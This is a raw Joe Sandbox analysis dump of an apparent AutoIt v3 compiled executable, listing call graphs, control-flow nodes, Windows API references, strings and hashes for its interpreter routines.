calls 105271->105272 105273 86076d 105272->105273 105274 851727 SystemParametersInfoW 105275 85a761 105284 858138 105275->105284 105277 85a79c 105280 85aa39 8 API calls 105277->105280 105278 85a772 105278->105277 105279 85ab97 8 API calls 105278->105279 105281 85a790 105279->105281 105283 85a667 105280->105283 105282 85aa39 8 API calls 105281->105282 105282->105277 105285 85abe7 8 API calls 105284->105285 105290 858147 105285->105290 105286 895c2f 105292 8b9d96 61 API calls __wsopen_s 105286->105292 105288 895c3d 105289 858195 105289->105278 105290->105286 105290->105289 105291 859c50 8 API calls 105290->105291 105291->105290 105292->105288 105293 85e360 105296 869ee3 105293->105296 105295 85e36c 105297 869f04 105296->105297 105304 869f61 105296->105304 105299 85f1e0 225 API calls 105297->105299 105297->105304 105301 869f35 105299->105301 105300 8a7f48 105300->105300 105302 869fa5 105301->105302 105301->105304 105305 85ad69 8 API calls __fread_nolock 105301->105305 105302->105295 105304->105302 105306 8c3d0b 59 API calls __wsopen_s 105304->105306 105305->105304 105306->105300 105307 8519a9 105308 8519b6 __wsopen_s 105307->105308 105323 854a1c 105308->105323 105310 8519bb 105311 851a35 105310->105311 105334 852061 59 API calls 105310->105334 105313 8519c8 105313->105311 105335 851d1b 61 API calls 105313->105335 105315 8519d1 105315->105311 105316 8519d5 GetFullPathNameW 105315->105316 105317 857467 8 API calls 105316->105317 105318 851a01 105317->105318 105319 857467 8 API calls 105318->105319 105320 851a0e 105319->105320 105321 892b08 105320->105321 105322 857467 8 API calls 105320->105322 105322->105311 105324 854a43 105323->105324 105332 854b60 105323->105332 105325 87015b 8 API calls 105324->105325 105324->105332 105327 854a6a 105325->105327 105326 87015b 8 API calls 105333 854adf 105326->105333 105327->105326 105328 854bb8 8 API calls 105328->105333 105331 85aa39 8 API calls 105331->105333 105332->105310 105333->105328 105333->105331 105333->105332 105336 85a400 105333->105336 105363 8c112a 8 API calls 105333->105363 105334->105313 105335->105315 105337 8569c4 8 API calls 105336->105337 105351 85a425 __fread_nolock 105337->105351 105338 85a64b 105339 85aa39 8 API calls 105338->105339 105342 85a665 105339->105342 105342->105333 105343 89fb5d 105353 87012b 8 API calls 105343->105353 105344 85abe7 8 API calls 105344->105351 105345 89fc84 105366 8b9d96 61 API calls __wsopen_s 105345->105366 105346 85aa39 8 API calls 105346->105351 105348 85a99d 105367 8b9d96 61 API calls __wsopen_s 105348->105367 105350 859c50 8 API calls 105350->105351 105351->105338 105351->105343 105351->105344 105351->105345 105351->105346 105351->105348 105351->105350 105358 89fbb8 __fread_nolock 105351->105358 105359 85b159 8 API calls 105351->105359 105360 85ab97 8 API calls 105351->105360 105362 87015b 8 API calls 105351->105362 105364 857eaa 40 API calls _wcslen 105351->105364 105365 856b3f 9 API calls __fread_nolock 105351->105365 105352 89fc92 105354 85aa39 8 API calls 105352->105354 105356 89fb7e 105353->105356 105355 89fca8 105354->105355 105355->105342 105357 87015b 8 API calls 105356->105357 105357->105358 105358->105348 105361 85a61c CharUpperBuffW 105359->105361 105360->105351 105361->105351 105362->105351 105363->105333 105364->105351 105365->105351 105366->105352 105367->105342 105368 8a0738 105369 8619c0 225 API calls 105368->105369 105370 8a074a 105369->105370 105372 85c130 105370->105372 105373 8c3d0b 59 API calls __wsopen_s 105370->105373 105373->105372 105374 881d7c 105383 88d191 GetEnvironmentStringsW 105374->105383 105378 882d18 _free 20 API calls 105379 881dc9 105378->105379 105380 881d9f 105381 882d18 _free 20 API calls 105380->105381 105382 881d94 105381->105382 105382->105378 105384 881d8e 105383->105384 105385 88d1a5 105383->105385 105384->105382 105390 881ea0 105384->105390 105386 883b70 __fread_nolock 21 API calls 105385->105386 105387 88d1b9 __fread_nolock 105386->105387 105388 882d18 _free 20 API calls 105387->105388 105389 88d1d3 FreeEnvironmentStringsW 105388->105389 105389->105384 105391 881ebe 105390->105391 105392 884fcd _abort 20 API calls 105391->105392 105401 881ef8 105392->105401 105393 881f69 105394 882d18 _free 20 API calls 105393->105394 105395 881f83 105394->105395 105395->105380 105396 884fcd _abort 20 API calls 105396->105401 105397 881f6b 105408 881f9a 20 API calls _free 105397->105408 105400 881f71 105403 882d18 _free 20 API calls 105400->105403 105401->105393 105401->105396 105401->105397 105402 881f8d 105401->105402 105405 882d18 _free 20 API calls 105401->105405 105407 88c3aa 26 API calls 2 library calls 105401->105407 105409 882abc 11 API calls _abort 105402->105409 105403->105393 105405->105401 105406 881f99 105407->105401 105408->105400 105409->105406 105410 851033 105415 855714 105410->105415 105414 851042 105416 85ae03 8 API calls 105415->105416 105417 855782 105416->105417 105423 854648 105417->105423 105419 85581f 105421 851038 105419->105421 105426 855974 8 API calls __fread_nolock 105419->105426 105422 8703f3 29 API calls __onexit 105421->105422 105422->105414 105427 854674 105423->105427 105426->105419 105428 854681 105427->105428 105429 854667 105427->105429 105428->105429 105430 854688 RegOpenKeyExW 105428->105430 105429->105419 105430->105429 105431 8546a2 RegQueryValueExW 105430->105431 105432 8546c3 105431->105432 105433 8546d8 RegCloseKey 105431->105433 105432->105433 105433->105429 105434 85e37c 105435 85b940 225 API calls 105434->105435 105436 85e38a 105435->105436 105437 852f78 105440 852f92 105437->105440 105441 852fa9 105440->105441 105442 85300d 105441->105442 105443 852fae 105441->105443 105480 85300b 105441->105480 105445 853013 105442->105445 105446 893084 105442->105446 105447 853087 PostQuitMessage 105443->105447 105448 852fbb 105443->105448 105444 852ff2 DefWindowProcW 105469 852f8c 105444->105469 105449 85303f SetTimer RegisterWindowMessageW 105445->105449 105450 85301a 105445->105450 105495 854286 10 API calls 105446->105495 105447->105469 105451 852fc6 105448->105451 105452 8930f1 105448->105452 105456 853068 CreatePopupMenu 105449->105456 105449->105469 105454 853023 KillTimer 105450->105454 105455 893025 105450->105455 105457 853091 105451->105457 105458 852fd0 105451->105458 105498 8bc631 53 API calls ___scrt_fastfail 105452->105498 105464 852f14 Shell_NotifyIconW 105454->105464 105462 89302a 105455->105462 105463 893060 MoveWindow 105455->105463 105456->105469 105485 86fc73 105457->105485 105465 852fdb 105458->105465 105466 8930d6 105458->105466 105460 8930a5 105496 86f09a 40 API calls 105460->105496 105470 89304f SetFocus 105462->105470 105471 893030 105462->105471 105463->105469 105472 853036 105464->105472 105473 853075 105465->105473 105474 852fe6 105465->105474 105466->105444 105497 8b11b9 8 API calls 105466->105497 105467 893103 105467->105444 105467->105469 105470->105469 105471->105474 105475 893039 105471->105475 105492 8547a8 DeleteObject DestroyWindow 105472->105492 105493 8530a2 63 API calls ___scrt_fastfail 105473->105493 105474->105444 105482 852f14 Shell_NotifyIconW 105474->105482 105494 854286 10 API calls 105475->105494 105480->105444 105481 853085 105481->105469 105483 8930ca 105482->105483 105484 853989 49 API calls 105483->105484 105484->105480 105486 86fd11 105485->105486 105487 86fc8b ___scrt_fastfail 105485->105487 105486->105469 105488 855033 43 API calls 105487->105488 105490 86fcb2 105488->105490 105489 86fcfa KillTimer SetTimer 105489->105486 105490->105489 105491 8afbc2 Shell_NotifyIconW 105490->105491 105491->105489 105492->105469 105493->105481 105494->105469 105495->105460 105496->105474 105497->105480 105498->105467

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 354 854e68-854ed7 call 85ae03 GetVersionExW call 857467 359 854edd 354->359 360 8940e6-8940f9 354->360 361 854edf-854ee1 359->361 362 8940fa-8940fe 360->362 363 854ee7-854f40 call 858635 call 85699d 361->363 364 894125 361->364 365 894101-89410d 362->365 366 894100 362->366 378 894259-894260 363->378 379 854f46-854f48 363->379 369 89412c-894136 364->369 365->362 368 89410f-894111 365->368 366->365 368->361 371 894117-89411e 368->371 372 894149-894155 369->372 373 894138-894144 369->373 371->360 375 894120 371->375 376 854fa6-854fc0 GetCurrentProcess IsWow64Process 372->376 373->376 375->364 380 854fc2 376->380 381 85501f-855025 376->381 382 894280-894283 378->382 383 894262 378->383 385 89415a-89416d 379->385 386 854f4e-854f51 379->386 384 854fc8-854fd4 380->384 381->384 391 89426e-894276 382->391 392 894285-894294 382->392 389 894268 383->389 393 89429e-8942a2 GetSystemInfo 384->393 394 854fda-854fe9 LoadLibraryA 384->394 387 89416f-894178 385->387 388 894196-894198 385->388 386->376 390 854f53-854f8f 386->390 395 89417a-894180 387->395 396 894185-894191 387->396 397 89419a-8941af 388->397 398 8941cd-8941d0 388->398 389->391 390->376 399 854f91-854f9a 390->399 391->382 392->389 400 894296-89429c 392->400 401 855027-855031 GetSystemInfo 394->401 402 854feb-854ff9 GetProcAddress 394->402 395->376 396->376 405 8941bc-8941c8 397->405 406 8941b1-8941b7 397->406 408 89420b-89420e 398->408 409 8941d2-8941ed 398->409 399->369 407 854fa0 399->407 400->391 404 855001-855003 401->404 402->401 403 854ffb-854fff GetNativeSystemInfo 402->403 403->404 411 855005-855006 FreeLibrary 404->411 412 85500c-85501e 404->412 405->376 406->376 407->376 408->376 410 894214-89423b 408->410 413 8941fa-894206 409->413 414 8941ef-8941f5 409->414 415 894248-894254 410->415 416 89423d-894243 410->416 411->412 413->376 414->376 415->376 416->376
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00854E97
                                                      • Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A
                                                    • GetCurrentProcess.KERNEL32(?,008EDB24,00000000,?,?), ref: 00854FAD
                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00854FB4
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00854FDF
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00854FF1
                                                    • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00854FFF
                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00855006
                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 0085502B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 3290436268-192647395
                                                    • Opcode ID: 63d1d6abb034d02133b39af20c62d286c5ce84e79210989c0f5a04f619cbb70b
                                                    • Instruction ID: 2e2632f862fee94857097e4d019577ba9cecf694d59fbd76dc5cba90e2f1280f
                                                    • Opcode Fuzzy Hash: 63d1d6abb034d02133b39af20c62d286c5ce84e79210989c0f5a04f619cbb70b
                                                    • Instruction Fuzzy Hash: F091C42282E3C4EFDB32DB7C7C415997FA4FB76B05B085899F480D7225D629444BEB21

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1348 8bd98e-8bd9d5 call 85ae03 * 3 call 853ff7 call 8be7da 1359 8bd9d7-8bd9e0 call 8559dc 1348->1359 1360 8bd9e5-8bda16 call 853e34 FindFirstFileW 1348->1360 1359->1360 1364 8bda18-8bda1a 1360->1364 1365 8bda85-8bda8c FindClose 1360->1365 1364->1365 1366 8bda1c-8bda21 1364->1366 1367 8bda90-8bdab2 call 85ac28 * 3 1365->1367 1368 8bda23-8bda5e call 85ad69 call 856aa4 call 8559dc DeleteFileW 1366->1368 1369 8bda60-8bda72 FindNextFileW 1366->1369 1368->1369 1383 8bda7c-8bda83 FindClose 1368->1383 1369->1364 1373 8bda74-8bda7a 1369->1373 1373->1364 1383->1367
                                                    APIs
                                                      • Part of subcall function 00853FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00853E0E,?,?,00892A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 00854017
                                                      • Part of subcall function 008BE7DA: GetFileAttributesW.KERNEL32(?,008BD57A), ref: 008BE7DB
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 008BDA05
                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 008BDA55
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 008BDA66
                                                    • FindClose.KERNEL32(00000000), ref: 008BDA7D
                                                    • FindClose.KERNEL32(00000000), ref: 008BDA86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 2649000838-1173974218
                                                    • Opcode ID: 9dee15532ad47193daf017f005774b0c5c70dde042759be8e069b14da2160914
                                                    • Instruction ID: 2b27a6b59b142419d0e971a27a21caa6dcac846b7483b93b2fa120026f939825
                                                    • Opcode Fuzzy Hash: 9dee15532ad47193daf017f005774b0c5c70dde042759be8e069b14da2160914
                                                    • Instruction Fuzzy Hash: 30313031008395ABC705EB68D8918EFBBE8FE95305F445A1DF8D5D2191EB209E0DC7A3
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 008BDAE6
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 008BDAF4
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 008BDB14
                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 008BDBC1
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3243318325-0
                                                    • Opcode ID: ac10d718143b958cf530e73323c758e43c848fb3ad6f48bae030a46999a3c61d
                                                    • Instruction ID: f661502526d0ef89d53a36ce9d1a9b928eb7c1adc542f55ec2d0f65c8fff1816
                                                    • Opcode Fuzzy Hash: ac10d718143b958cf530e73323c758e43c848fb3ad6f48bae030a46999a3c61d
                                                    • Instruction Fuzzy Hash: 9A318D71008341AFD304EF54C8C1AAEBBE8FF98350F04092DF981C62A1EB719A49CB93
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,00893902), ref: 008BE1BC
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 008BE1CD
                                                    • FindClose.KERNEL32(00000000), ref: 008BE1DD
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: c832c2167a034637bd4dcfdcfffdf3edc406596fd9b99b8e0f30f2c265cdca50
                                                    • Instruction ID: d6698e4fab7f107e715e869e0d6ef31745a18d2f95f0d645f892418ec7aee48d
                                                    • Opcode Fuzzy Hash: c832c2167a034637bd4dcfdcfffdf3edc406596fd9b99b8e0f30f2c265cdca50
                                                    • Instruction Fuzzy Hash: EAE048358146145F5210673CEC4D8EA775CFA06336F200715F975C52E0E774ED4445A5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 8535d5-8535e5 call 87015b 2 8535ea-853605 call 87012b 0->2 5 853607-853609 2->5 6 85362e-853640 call 87915b 2->6 8 85360a-853610 5->8 6->8 13 853642-853654 call 87915b 6->13 10 853625-85362b 8->10 11 853612-853622 call 87011d call 870164 8->11 11->10 19 893801-893803 13->19 20 85365a-85366c call 87915b 13->20 19->8 23 893808-89380b 20->23 24 853672-853684 call 87915b 20->24 23->8 27 893810-893847 call 853914 call 853853 call 853778 call 874cb3 24->27 28 85368a-85369c call 87915b 24->28 60 893849-893854 27->60 61 893884-893887 27->61 33 8938aa-8938af 28->33 34 8536a2-8536b4 call 87915b 28->34 33->8 38 8938b5-8938d1 call 86e224 33->38 43 8938f3-893904 call 8ba13b 34->43 44 8536ba-8536cc call 87915b 34->44 46 8938de-8938e6 38->46 47 8938d3-8938d7 38->47 56 893958-89395e 43->56 57 893906-89394e call 85a1d4 * 2 call 853c2f call 85326c call 85ac28 * 2 43->57 58 8536e6 44->58 59 8536ce-8536e0 call 87915b 44->59 46->8 52 8938ec 46->52 47->38 51 8938d9 47->51 51->8 52->43 63 893971-89397b call 8b9f4f 56->63 79 893980-893982 57->79 105 893950-893953 57->105 68 8536e9-8536f5 call 859d04 58->68 59->8 59->58 60->61 62 893856-89385d 60->62 64 893889-893897 61->64 65 893872-89387f call 870164 61->65 62->65 69 89385f-893863 62->69 63->79 78 89389c-8938a5 call 870164 64->78 65->63 81 893960-893965 68->81 82 8536fb-85371e call 853778 call 853853 call 87915b 68->82 69->65 76 893865-893870 69->76 76->78 78->8 79->8 81->8 87 89396b-89396c 81->87 101 853770-853773 82->101 102 853720-853732 call 87915b 82->102 87->63 101->68 102->101 107 853734-853746 call 87915b 102->107 105->8 110 85375c-853765 107->110 111 853748-85375a call 87915b 107->111 110->8 112 85376b 110->112 111->68 111->110 112->68
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 0-1645009161
                                                    • Opcode ID: 47489a37e58972dd7fa698c8ec0de276548daea069e7494db1eae6d125c8b0f5
                                                    • Instruction ID: 7025534dd3270e9b52a5ddf097c56d2c3046607879dd870c218fb39ccfcc8498
                                                    • Opcode Fuzzy Hash: 47489a37e58972dd7fa698c8ec0de276548daea069e7494db1eae6d125c8b0f5
                                                    • Instruction Fuzzy Hash: 5781E771A40209BBCF10EB64DC42FAA3BA4FF15385F044024FD05EA295EB74DB59D7A2
                                                    APIs
                                                    • GetInputState.USER32 ref: 0085DDA7
                                                    • timeGetTime.WINMM ref: 0085DFA7
                                                    • Sleep.KERNEL32(0000000A), ref: 0085E151
                                                    • Sleep.KERNEL32(0000000A), ref: 008A310C
                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 008A31A7
                                                    • WaitForSingleObject.KERNEL32(?,00000000), ref: 008A31BF
                                                    • CloseHandle.KERNEL32(?), ref: 008A31D3
                                                    • Sleep.KERNEL32(?,CCCCCCCC,00000000), ref: 008A323F
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime
                                                    • String ID:
                                                    • API String ID: 388478766-0
                                                    • Opcode ID: 0c80acabba7a6e2d233527698494ceb7150767d01f7d2e4e227c0bc7ba3278dc
                                                    • Instruction ID: cf8ad52fddecdabe84f541bbff7aa325a101bf02ffcb2ec217de855c666e0fd6
                                                    • Opcode Fuzzy Hash: 0c80acabba7a6e2d233527698494ceb7150767d01f7d2e4e227c0bc7ba3278dc
                                                    • Instruction Fuzzy Hash: D842BF70608745EFE738CB28C844B6AB7A5FF42306F14451DF85AC7691DB74E988CB92

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 008529EF
                                                    • RegisterClassExW.USER32(00000030), ref: 00852A19
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00852A2A
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00852A47
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00852A57
                                                    • LoadIconW.USER32(000000A9), ref: 00852A6D
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00852A7C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: 86e03d1252589c46dd8a1c9cb976d54044b4e8293a7889d6425dba650cc38528
                                                    • Instruction ID: 074fadc31ea3a478748b402f95781ccbf19b73a55b7e10ceb016ef3fcb5d833b
                                                    • Opcode Fuzzy Hash: 86e03d1252589c46dd8a1c9cb976d54044b4e8293a7889d6425dba650cc38528
                                                    • Instruction Fuzzy Hash: BF2122B5915358AFDB10DFA4ED88B9DBBF4FB08710F00411AFA10AA2A0D7B54189DF90

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 418 8909ae-8909de call 890782 421 8909f9-890a05 call 885571 418->421 422 8909e0-8909eb call 882b55 418->422 428 890a1e-890a67 call 8906ed 421->428 429 890a07-890a1c call 882b55 call 882b68 421->429 427 8909ed-8909f4 call 882b68 422->427 438 890cd0-890cd6 427->438 436 890a69-890a72 428->436 437 890ad4-890add GetFileType 428->437 429->427 440 890aa9-890acf GetLastError call 882b32 436->440 441 890a74-890a78 436->441 442 890adf-890b10 GetLastError call 882b32 CloseHandle 437->442 443 890b26-890b29 437->443 440->427 441->440 447 890a7a-890aa7 call 8906ed 441->447 442->427 457 890b16-890b21 call 882b68 442->457 445 890b2b-890b30 443->445 446 890b32-890b38 443->446 450 890b3c-890b8a call 8854ba 445->450 446->450 451 890b3a 446->451 447->437 447->440 460 890b9a-890bbe call 8904a0 450->460 461 890b8c-890b98 call 8908fe 450->461 451->450 457->427 468 890bd1-890c14 460->468 469 890bc0 460->469 461->460 467 890bc2-890bcc call 8889fe 461->467 467->438 470 890c35-890c43 468->470 471 890c16-890c1a 468->471 469->467 475 890c49-890c4d 470->475 476 890cce 470->476 471->470 474 890c1c-890c30 471->474 474->470 475->476 477 890c4f-890c82 CloseHandle call 8906ed 475->477 476->438 480 890c84-890cb0 GetLastError call 882b32 call 885683 477->480 481 890cb6-890cca 477->481 480->481 481->476
                                                    APIs
                                                      • Part of subcall function 008906ED: CreateFileW.KERNEL32(00000000,00000000,?,00890A57,?,?,00000000,?,00890A57,00000000,0000000C), ref: 0089070A
                                                    • GetLastError.KERNEL32 ref: 00890AC2
                                                    • __dosmaperr.LIBCMT ref: 00890AC9
                                                    • GetFileType.KERNEL32(00000000), ref: 00890AD5
                                                    • GetLastError.KERNEL32 ref: 00890ADF
                                                    • __dosmaperr.LIBCMT ref: 00890AE8
                                                    • CloseHandle.KERNEL32(00000000), ref: 00890B08
                                                    • CloseHandle.KERNEL32(?), ref: 00890C52
                                                    • GetLastError.KERNEL32 ref: 00890C84
                                                    • __dosmaperr.LIBCMT ref: 00890C8B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                    • String ID: H
                                                    • API String ID: 4237864984-2852464175
                                                    • Opcode ID: e7bf731e65c87b52dff218c3021129b4e7e9c20cd1fc94c838a4f2b2fcb3d49c
                                                    • Instruction ID: 3b500feab6acfc13c1bae9ac995e7e83ba01edbeca97a5a466a986f0349e575d
                                                    • Opcode Fuzzy Hash: e7bf731e65c87b52dff218c3021129b4e7e9c20cd1fc94c838a4f2b2fcb3d49c
                                                    • Instruction Fuzzy Hash: C8A10132A142588FDF19AF6CD8927AE7BA0FB06324F180159F811EB3D1DB319D12CB52

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00853DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00892A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00853DEF
                                                      • Part of subcall function 00853A75: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00853A97
                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00853C01
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008939E6
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00893A27
                                                    • RegCloseKey.ADVAPI32(?), ref: 00893A69
                                                    • _wcslen.LIBCMT ref: 00893AD0
                                                    • _wcslen.LIBCMT ref: 00893ADF
